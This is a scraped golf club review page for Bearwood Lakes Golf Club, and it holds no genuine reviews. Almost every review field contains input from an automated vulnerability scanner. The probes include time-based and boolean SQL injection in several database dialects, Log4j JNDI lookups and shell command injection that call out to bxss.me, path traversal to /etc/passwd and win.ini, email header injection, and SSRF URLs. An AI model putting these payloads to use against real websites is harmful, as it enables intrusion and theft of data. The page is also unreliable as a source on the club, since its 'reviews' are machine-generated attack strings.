Bearwood Lakes Golf Club
Bearwood Lakes Golf Club

Bearwood Lakes Golf Club

Course Information

Location

Bearwood Lakes Golf Club Bearwood Road Sindlesham Wokingham RG41 4SJ

Reviews

MBWUpmEH

11 November 2021

1
Mr.

555

MBWUpmEH

11 November 2021

2
Mr.

555

MBWUpmEH

11 November 2021

1
Mr.

555

MBWUpmEH

11 November 2021

2
Mr.

555

MBWUpmEH

11 November 2021

3
Mr.

555

MBWUpmEH

11 November 2021

1
Mr.

555

MBWUpmEH

11 November 2021

2
Mr.

555

MBWUpmEH

11 November 2021

3
Mr.

555

MBWUpmEH

11 November 2021

2
Mr.

82xPY0L4

MBWUpmEH

11 November 2021

2
Mr.

-1 OR 2+626-626-1=0+0+0+1 --

MBWUpmEH

11 November 2021

2
Mr.

-1 OR 2+191-191-1=0+0+0+1

MBWUpmEH

11 November 2021

2
Mr.

-1' OR 2+892-892-1=0+0+0+1 --

MBWUpmEH

11 November 2021

3
Mr.

DpAVilwG

MBWUpmEH

11 November 2021

2
Mr.

-1' OR 2+809-809-1=0+0+0+1 or 'G9gSb8C9'='

MBWUpmEH

11 November 2021

3
Mr.

-1 OR 2+769-769-1=0+0+0+1 --

MBWUpmEH

11 November 2021

2
Mr.

-1" OR 2+364-364-1=0+0+0+1 --

MBWUpmEH

11 November 2021

3
Mr.

-1 OR 2+202-202-1=0+0+0+1

MBWUpmEH

11 November 2021

3
Mr.

-1' OR 2+91-91-1=0+0+0+1 --

MBWUpmEH

11 November 2021

3
Mr.

-1' OR 2+938-938-1=0+0+0+1 or 'ghcuHSGh'='

MBWUpmEH

11 November 2021

3
Mr.

-1" OR 2+922-922-1=0+0+0+1 --

MBWUpmEH

11 November 2021

2
Mr.

if(now()=sysdate(),sleep(15),0)

MBWUpmEH

11 November 2021

3
Mr.

if(now()=sysdate(),sleep(15),0)

MBWUpmEH

11 November 2021

2
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

MBWUpmEH

11 November 2021

3
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

MBWUpmEH

11 November 2021

2
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

MBWUpmEH

11 November 2021

3
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

MBWUpmEH

11 November 2021

2
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

MBWUpmEH

11 November 2021

3
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

MBWUpmEH

11 November 2021

2
Mr.

-1; waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

3
Mr.

-1; waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
Mr.

-1); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

3
Mr.

-1); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
Mr.

-1)); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

3
Mr.

-1)); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
Mr.

1 waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

3
Mr.

1 waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
Mr.

UZ2VRjTM'; waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

3
Mr.

iMemH8jh'; waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
Mr.

d7N7mIqd'); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

3
Mr.

C9dDcrfR'); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
Mr.

YvD9n4Mv')); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

3
Mr.

LbYcVzdR')); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
Mr.

-5 OR 125=(SELECT 125 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

3
Mr.

-5 OR 494=(SELECT 494 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

2
Mr.

-5) OR 153=(SELECT 153 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

3
Mr.

-5) OR 765=(SELECT 765 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

2
Mr.

-1)) OR 560=(SELECT 560 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

3
Mr.

-1)) OR 975=(SELECT 975 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

2
Mr.

GDiGPDVN' OR 32=(SELECT 32 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

3
Mr.

4f6jpyNr' OR 307=(SELECT 307 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

2
Mr.

1FESdDSo') OR 144=(SELECT 144 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

3
Mr.

cFV3j6hn') OR 101=(SELECT 101 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

2
Mr.

UWnxKaBz')) OR 299=(SELECT 299 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

3
Mr.

9pZFbF7I')) OR 204=(SELECT 204 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

2
Mr.

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

MBWUpmEH

11 November 2021

3
Mr.

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

MBWUpmEH

11 November 2021

2
Mr.

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

MBWUpmEH

11 November 2021

2
Mr.

1'"

MBWUpmEH

11 November 2021

2
Mr.

1����%2527%2522

MBWUpmEH

11 November 2021

2
Mr.

@@Xzn7q

MBWUpmEH

11 November 2021

3
Mr.

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

MBWUpmEH

11 November 2021

3
Mr.

1'"

MBWUpmEH

11 November 2021

3
Mr.

1����%2527%2522

MBWUpmEH

11 November 2021

3
Mr.

@@mJiVU

MBWUpmEH

11 November 2021

1
Mr.

555

MBWUpmEH

11 November 2021

2
Mr.

555

MBWUpmEH

11 November 2021

3
Mr.

555

MBWUpmEH

11 November 2021

1
Mr.

555

MBWUpmEH

11 November 2021

2
Mr.

555

MBWUpmEH

11 November 2021

3
Mr.

555

MBWUpmEH

11 November 2021

1
Mr.

virhGUnc

MBWUpmEH

11 November 2021

1
Mr.

-1 OR 2+858-858-1=0+0+0+1 --

MBWUpmEH

11 November 2021

1
Mr.

-1 OR 2+766-766-1=0+0+0+1

MBWUpmEH

11 November 2021

1
Mr.

-1' OR 2+87-87-1=0+0+0+1 --

MBWUpmEH

11 November 2021

2
dk8VTxd3

555

MBWUpmEH

11 November 2021

1
Mr.

-1' OR 2+106-106-1=0+0+0+1 or 'WTMHsaxT'='

MBWUpmEH

11 November 2021

2
-1 OR 2+25-25-1=0+0+0+1 --

555

MBWUpmEH

11 November 2021

1
Mr.

-1" OR 2+513-513-1=0+0+0+1 --

MBWUpmEH

11 November 2021

2
-1 OR 2+613-613-1=0+0+0+1

555

MBWUpmEH

11 November 2021

3
XfWqTGZX

555

MBWUpmEH

11 November 2021

2
-1' OR 2+929-929-1=0+0+0+1 --

555

MBWUpmEH

11 November 2021

3
-1 OR 2+785-785-1=0+0+0+1 --

555

MBWUpmEH

11 November 2021

2
-1' OR 2+950-950-1=0+0+0+1 or '5BX6X7Yx'='

555

MBWUpmEH

11 November 2021

3
-1 OR 2+362-362-1=0+0+0+1

555

MBWUpmEH

11 November 2021

2
-1" OR 2+52-52-1=0+0+0+1 --

555

MBWUpmEH

11 November 2021

3
-1' OR 2+191-191-1=0+0+0+1 --

555

MBWUpmEH

11 November 2021

3
-1' OR 2+127-127-1=0+0+0+1 or 'WghMAMoJ'='

555

MBWUpmEH

11 November 2021

3
-1" OR 2+797-797-1=0+0+0+1 --

555

MBWUpmEH

11 November 2021

1
Mr.

if(now()=sysdate(),sleep(15),0)

MBWUpmEH

11 November 2021

2
if(now()=sysdate(),sleep(15),0)

555

MBWUpmEH

11 November 2021

3
if(now()=sysdate(),sleep(15),0)

555

MBWUpmEH

11 November 2021

1
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

MBWUpmEH

11 November 2021

2
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

MBWUpmEH

11 November 2021

3
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

MBWUpmEH

11 November 2021

1
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

MBWUpmEH

11 November 2021

2
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555

MBWUpmEH

11 November 2021

3
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555

MBWUpmEH

11 November 2021

1
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

MBWUpmEH

11 November 2021

2
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

MBWUpmEH

11 November 2021

3
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

MBWUpmEH

11 November 2021

1
Mr.

-1; waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
1 waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

3
1 waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

1
Mr.

-1); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
lJKKTgKS'; waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

3
A9Gozo6Y'; waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

1
Mr.

-1)); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
pLpD4erD'); waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

3
UaT2ftZa'); waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

1
Mr.

1 waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
XjoDBy0U')); waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

3
6F8qQ6zU')); waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

1
Mr.

VyJInnPH'; waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
s9vGDfzb' OR 802=(SELECT 802 FROM PG_SLEEP(15))--

555

MBWUpmEH

11 November 2021

3
j0gYSgLs' OR 978=(SELECT 978 FROM PG_SLEEP(15))--

555

MBWUpmEH

11 November 2021

1
Mr.

jhqenuRv'); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
2GZeTkGq') OR 30=(SELECT 30 FROM PG_SLEEP(15))--

555

MBWUpmEH

11 November 2021

3
6TzcvyhI') OR 293=(SELECT 293 FROM PG_SLEEP(15))--

555

MBWUpmEH

11 November 2021

1
Mr.

0qoEhYpV')); waitfor delay '0:0:15' --

MBWUpmEH

11 November 2021

2
SAeX7sCE')) OR 893=(SELECT 893 FROM PG_SLEEP(15))--

555

MBWUpmEH

11 November 2021

3
aDSz6eU8')) OR 931=(SELECT 931 FROM PG_SLEEP(15))--

555

MBWUpmEH

11 November 2021

1
Mr.

-5 OR 804=(SELECT 804 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

2
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

MBWUpmEH

11 November 2021

2
1'"

555

MBWUpmEH

11 November 2021

2
1����%2527%2522

555

MBWUpmEH

11 November 2021

2
@@2gh3t

555

MBWUpmEH

11 November 2021

3
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

MBWUpmEH

11 November 2021

3
1'"

555

MBWUpmEH

11 November 2021

3
1����%2527%2522

555

MBWUpmEH

11 November 2021

3
@@j5koo

555

MBWUpmEH

11 November 2021

1
Mr.

-5) OR 461=(SELECT 461 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

1
Mr.

-1)) OR 347=(SELECT 347 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

1
Mr.

vBc27Urt' OR 368=(SELECT 368 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

1
Mr.

4rS9m1VJ') OR 622=(SELECT 622 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

1
Mr.

Me8X9xAA')) OR 745=(SELECT 745 FROM PG_SLEEP(15))--

MBWUpmEH

11 November 2021

1
Mr.

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

MBWUpmEH

11 November 2021

1
Mr.

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

MBWUpmEH

11 November 2021

1
Mr.

1'"

MBWUpmEH

11 November 2021

1
Mr.

1����%2527%2522

MBWUpmEH

11 November 2021

1
Mr.

@@168N1

MBWUpmEH

11 November 2021

1
Mr.

555

MBWUpmEH

11 November 2021

1
Mr.

555

MBWUpmEH

11 November 2021

1
KJDUCaoe

555

MBWUpmEH

11 November 2021

1
-1 OR 2+835-835-1=0+0+0+1 --

555

MBWUpmEH

11 November 2021

1
-1 OR 2+456-456-1=0+0+0+1

555

MBWUpmEH

11 November 2021

1
-1' OR 2+969-969-1=0+0+0+1 --

555

MBWUpmEH

11 November 2021

1
-1' OR 2+488-488-1=0+0+0+1 or 'jlQwPLRm'='

555

MBWUpmEH

11 November 2021

1
-1" OR 2+552-552-1=0+0+0+1 --

555

MBWUpmEH

11 November 2021

1
if(now()=sysdate(),sleep(15),0)

555

MBWUpmEH

11 November 2021

1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

MBWUpmEH

11 November 2021

1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555

MBWUpmEH

11 November 2021

1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

MBWUpmEH

11 November 2021

1
1 waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

1
q87Gj1Ay'; waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

1
rWqtcwHP'); waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

1
6B25DAXQ')); waitfor delay '0:0:15' --

555

MBWUpmEH

11 November 2021

1
6CyX2MVR' OR 570=(SELECT 570 FROM PG_SLEEP(15))--

555

MBWUpmEH

11 November 2021

1
xee9uUO7') OR 731=(SELECT 731 FROM PG_SLEEP(15))--

555

MBWUpmEH

11 November 2021

1
3NE9W4vp')) OR 46=(SELECT 46 FROM PG_SLEEP(15))--

555

MBWUpmEH

11 November 2021

1
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

MBWUpmEH

11 November 2021

1
1'"

555

MBWUpmEH

11 November 2021

1
1����%2527%2522

555

MBWUpmEH

11 November 2021

1
@@loI6F

555

MBWUpmEH

11 November 2021

3
Mr.

555

MBWUpmEH

11 November 2021

2
Mr.

555

MBWUpmEH

11 November 2021

1
Mr.

555

MBWUpmEH

18 December 2021

1
Mr.

555

MBWUpmEH

18 December 2021

1
Mr.

555

MBWUpmEH

18 December 2021

1
Mr.

555

MBWUpmEH

18 December 2021

1
Mr.

555

MBWUpmEH

18 December 2021

1
Mr.

555

MBWUpmEH

18 December 2021

1
Mr.

60hekR5m

MBWUpmEH

18 December 2021

1
Mr.

-1 OR 2+105-105-1=0+0+0+1 --

MBWUpmEH

18 December 2021

1
Mr.

-1 OR 2+236-236-1=0+0+0+1

MBWUpmEH

18 December 2021

1
Mr.

-1' OR 2+13-13-1=0+0+0+1 --

MBWUpmEH

18 December 2021

1
Mr.

-1' OR 2+272-272-1=0+0+0+1 or 'H8Pjyjx4'='

MBWUpmEH

18 December 2021

1
Mr.

-1" OR 2+70-70-1=0+0+0+1 --

MBWUpmEH

18 December 2021

1
Mr.

if(now()=sysdate(),sleep(15),0)

MBWUpmEH

18 December 2021

1
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

MBWUpmEH

18 December 2021

1
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

MBWUpmEH

18 December 2021

1
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

MBWUpmEH

18 December 2021

1
Mr.

-1; waitfor delay '0:0:15' --

MBWUpmEH

18 December 2021

1
Mr.

-1); waitfor delay '0:0:15' --

MBWUpmEH

18 December 2021

1
Mr.

-1)); waitfor delay '0:0:15' --

MBWUpmEH

18 December 2021

1
Mr.

1 waitfor delay '0:0:15' --

MBWUpmEH

18 December 2021

1
Mr.

4c4iIGxw'; waitfor delay '0:0:15' --

MBWUpmEH

18 December 2021

1
Mr.

VmeMDJhy'); waitfor delay '0:0:15' --

MBWUpmEH

18 December 2021

1
Mr.

XqVk8psG')); waitfor delay '0:0:15' --

MBWUpmEH

18 December 2021

1
Mr.

-5 OR 632=(SELECT 632 FROM PG_SLEEP(15))--

MBWUpmEH

18 December 2021

1
Mr.

-5) OR 823=(SELECT 823 FROM PG_SLEEP(15))--

MBWUpmEH

18 December 2021

1
Mr.

-1)) OR 121=(SELECT 121 FROM PG_SLEEP(15))--

MBWUpmEH

18 December 2021

1
Mr.

tTfLGOUT' OR 416=(SELECT 416 FROM PG_SLEEP(15))--

MBWUpmEH

18 December 2021

1
Mr.

rea1c0Ba') OR 625=(SELECT 625 FROM PG_SLEEP(15))--

MBWUpmEH

18 December 2021

1
Mr.

KPUj9Ye0')) OR 415=(SELECT 415 FROM PG_SLEEP(15))--

MBWUpmEH

18 December 2021

1
Mr.

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

MBWUpmEH

18 December 2021

1
Mr.

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

MBWUpmEH

18 December 2021

1
Mr.

1'"

MBWUpmEH

18 December 2021

1
Mr.

1����%2527%2522

MBWUpmEH

18 December 2021

1
Mr.

@@xJGxQ

MBWUpmEH

18 December 2021

1
Mr.

555

MBWUpmEH

18 December 2021

1
Mr.

555

MBWUpmEH

18 December 2021

1
QZbvtOSz

555

MBWUpmEH

18 December 2021

1
-1 OR 2+286-286-1=0+0+0+1 --

555

MBWUpmEH

18 December 2021

1
-1 OR 2+405-405-1=0+0+0+1

555

MBWUpmEH

18 December 2021

1
-1' OR 2+966-966-1=0+0+0+1 --

555

MBWUpmEH

18 December 2021

1
-1' OR 2+994-994-1=0+0+0+1 or 'X4TUnVWO'='

555

MBWUpmEH

18 December 2021

1
-1" OR 2+693-693-1=0+0+0+1 --

555

MBWUpmEH

18 December 2021

1
if(now()=sysdate(),sleep(15),0)

555

MBWUpmEH

18 December 2021

1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

MBWUpmEH

18 December 2021

1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555

MBWUpmEH

18 December 2021

1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

MBWUpmEH

18 December 2021

1
1 waitfor delay '0:0:15' --

555

MBWUpmEH

18 December 2021

1
C0r8WYqD'; waitfor delay '0:0:15' --

555

MBWUpmEH

18 December 2021

1
NruLMlkA'); waitfor delay '0:0:15' --

555

MBWUpmEH

18 December 2021

1
u0oPlEyK')); waitfor delay '0:0:15' --

555

MBWUpmEH

18 December 2021

1
BwVttUbJ' OR 747=(SELECT 747 FROM PG_SLEEP(15))--

555

MBWUpmEH

18 December 2021

1
ymQ8tQGi') OR 821=(SELECT 821 FROM PG_SLEEP(15))--

555

MBWUpmEH

18 December 2021

1
atuYcpk9')) OR 947=(SELECT 947 FROM PG_SLEEP(15))--

555

MBWUpmEH

18 December 2021

1
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

MBWUpmEH

18 December 2021

1
1'"

555

MBWUpmEH

18 December 2021

1
1����%2527%2522

555

MBWUpmEH

18 December 2021

1
@@eJ0cX

555

MBWUpmEH

18 December 2021

1
Mr.

555

MBWUpmEH

22 March 2022

4

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

5
Mr.

1

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
Mr.

1cPmxkEzO

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
1pYbX4CgO

555

MBWUpmEH

22 March 2022

1
Mr.

${j${::-n}di:dns${::-:}${::-/}/hituxysypmvdcf7860${::-.}bxss.me}zzzz

MBWUpmEH

22 March 2022

1
Mr.

response.write(9947504*9754205)

MBWUpmEH

22 March 2022

1
Mr.

�💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitrljzyyvlnd9a28b${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

MBWUpmEH

22 March 2022

1
Mr.

'+response.write(9947504*9754205)+'

MBWUpmEH

22 March 2022

1
Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.009247.80-2698.80.c4990${::-.}1${::-.}bxss.me}}

MBWUpmEH

22 March 2022

1
Mr.

"+response.write(9947504*9754205)+"

MBWUpmEH

22 March 2022

1
${j${::-n}di:dns${::-:}${::-/}/hitejhvzwltzzdc5f8${::-.}bxss.me}zzzz

555

MBWUpmEH

22 March 2022

1
�💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitmncggpuegc4eab0${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

555

MBWUpmEH

22 March 2022

1
response.write(9943632*9175979)

555

MBWUpmEH

22 March 2022

1
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.009247.80-2720.80.c4990${::-.}1${::-.}bxss.me}}

555

MBWUpmEH

22 March 2022

1
'+response.write(9943632*9175979)+'

555

MBWUpmEH

22 March 2022

1
"+response.write(9943632*9175979)+"

555

MBWUpmEH

22 March 2022

1
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

MBWUpmEH

22 March 2022

1
/../../../../../../../../../../windows/system32/BITSADMIN.exe

555

MBWUpmEH

22 March 2022

1
Mr.

6TnaTX4G

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
CJdz3ImN

555

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
Mr.

555 bcc:009247.80-2729.80.c4990.19073.2@bxss.me

MBWUpmEH

22 March 2022

1
Mr.

to@example.com> bcc:009247.80-2730.80.c4990.19073.2@bxss.me

MBWUpmEH

22 March 2022

1
Mr. bcc:009247.80-2731.80.c4990.19073.2@bxss.me

555

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
to@example.com> bcc:009247.80-2732.80.c4990.19073.2@bxss.me

555

MBWUpmEH

22 March 2022

1
Mr.

../../../../../../../../../../../../../../etc/passwd

MBWUpmEH

22 March 2022

1
Mr.

../../../../../../../../../../../../../../windows/win.ini

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
Mr.

../555

MBWUpmEH

22 March 2022

1
Mr.

MBWUpmEH

22 March 2022

1
../../../../../../../../../../../../../../etc/passwd

555

MBWUpmEH

22 March 2022

1
Mr.

echo xpsyvt$()\ dzlxvo\nz^xyu||a #' &echo xpsyvt$()\ dzlxvo\nz^xyu||a #|" &echo xpsyvt$()\ dzlxvo\nz^xyu||a #

MBWUpmEH

22 March 2022

1
Mr.

12345'"\'\");|]*{ <>�''💡

MBWUpmEH

22 March 2022

1
Mr.

${10000357+10000427}

MBWUpmEH

22 March 2022

1
Mr.

&echo jrfrcs$()\ gttnky\nz^xyu||a #' &echo jrfrcs$()\ gttnky\nz^xyu||a #|" &echo jrfrcs$()\ gttnky\nz^xyu||a #

MBWUpmEH

22 March 2022

1
../../../../../../../../../../../../../../windows/win.ini

555

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
${10000366+9999450}

555

MBWUpmEH

22 March 2022

1
Mr.

|echo aahjao$()\ zgahrl\nz^xyu||a #' |echo aahjao$()\ zgahrl\nz^xyu||a #|" |echo aahjao$()\ zgahrl\nz^xyu||a #

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1

555

MBWUpmEH

22 March 2022

1
Mr.

(nslookup hithjvkbagtmn343dd.bxss.me||perl -e "gethostbyname('hithjvkbagtmn343dd.bxss.me')")

MBWUpmEH

22 March 2022

1
../Mr.

555

MBWUpmEH

22 March 2022

1
12345'"\'\");|]*{ <>�''💡

555

MBWUpmEH

22 March 2022

1
Mr.

$(nslookup hityhhhuatyrf97c8c.bxss.me||perl -e "gethostbyname('hityhhhuatyrf97c8c.bxss.me')")

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
Mr.

&(nslookup hitcljdxccucf2da17.bxss.me||perl -e "gethostbyname('hitcljdxccucf2da17.bxss.me')")&'\"`0&(nslookup hitcljdxccucf2da17.bxss.me||perl -e "gethostbyname('hitcljdxccucf2da17.bxss.me')")&`'

MBWUpmEH

22 March 2022

1
Mr.

|(nslookup hitteiytjovat24ac2.bxss.me||perl -e "gethostbyname('hitteiytjovat24ac2.bxss.me')")

MBWUpmEH

22 March 2022

1
Mr.

`(nslookup hitvfpzusvjzw13432.bxss.me||perl -e "gethostbyname('hitvfpzusvjzw13432.bxss.me')")`

MBWUpmEH

22 March 2022

1
Mr.

555&n936572=v936459

MBWUpmEH

22 March 2022

1
Mr.

;(nslookup hitukdmpfclyme9930.bxss.me||perl -e "gethostbyname('hitukdmpfclyme9930.bxss.me')")|(nslookup hitukdmpfclyme9930.bxss.me||perl -e "gethostbyname('hitukdmpfclyme9930.bxss.me')")&(nslookup hitukdmpfclyme9930.bxss.me||perl -e "gethostbyname('hitukdmpfclyme9930.bxss.me')")

MBWUpmEH

22 March 2022

1
Mr.&n912831=v908601

555

MBWUpmEH

22 March 2022

1
echo eadwym$()\ mwpvlk\nz^xyu||a #' &echo eadwym$()\ mwpvlk\nz^xyu||a #|" &echo eadwym$()\ mwpvlk\nz^xyu||a #

555

MBWUpmEH

22 March 2022

1
&echo stxgkq$()\ mfncar\nz^xyu||a #' &echo stxgkq$()\ mfncar\nz^xyu||a #|" &echo stxgkq$()\ mfncar\nz^xyu||a #

555

MBWUpmEH

22 March 2022

1
|echo mfpvhi$()\ idfcyx\nz^xyu||a #' |echo mfpvhi$()\ idfcyx\nz^xyu||a #|" |echo mfpvhi$()\ idfcyx\nz^xyu||a #

555

MBWUpmEH

22 March 2022

1
(nslookup hitksojvawwmj4e586.bxss.me||perl -e "gethostbyname('hitksojvawwmj4e586.bxss.me')")

555

MBWUpmEH

22 March 2022

1
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

MBWUpmEH

22 March 2022

1
Mr.

1some_inexistent_file_with_long_name.jpg

MBWUpmEH

22 March 2022

1
$(nslookup hitzlfvpwanbd96ef0.bxss.me||perl -e "gethostbyname('hitzlfvpwanbd96ef0.bxss.me')")

555

MBWUpmEH

22 March 2022

1
Mr.

Http://bxss.me/t/fit.txt

MBWUpmEH

22 March 2022

1
&(nslookup hittgbitbjuxcaf30c.bxss.me||perl -e "gethostbyname('hittgbitbjuxcaf30c.bxss.me')")&'\"`0&(nslookup hittgbitbjuxcaf30c.bxss.me||perl -e "gethostbyname('hittgbitbjuxcaf30c.bxss.me')")&`'

555

MBWUpmEH

22 March 2022

1
Mr.

'"()

MBWUpmEH

22 March 2022

1
Mr.

http://bxss.me/t/fit.txt?.jpg

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
Mr.

)

MBWUpmEH

22 March 2022

1
|(nslookup hitxgnbwvmzaoa9561.bxss.me||perl -e "gethostbyname('hitxgnbwvmzaoa9561.bxss.me')")

555

MBWUpmEH

22 March 2022

1
Mr.

bxss.me

MBWUpmEH

22 March 2022

1
Mr.

555

MBWUpmEH

22 March 2022

1
Mr.

!(()&&!|*|*|

MBWUpmEH

22 March 2022

1
`(nslookup hityyrjuiqshrf3ac7.bxss.me||perl -e "gethostbyname('hityyrjuiqshrf3ac7.bxss.me')")`

555

MBWUpmEH

22 March 2022

1
'"()

555

MBWUpmEH

22 March 2022

1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.

555

MBWUpmEH

22 March 2022

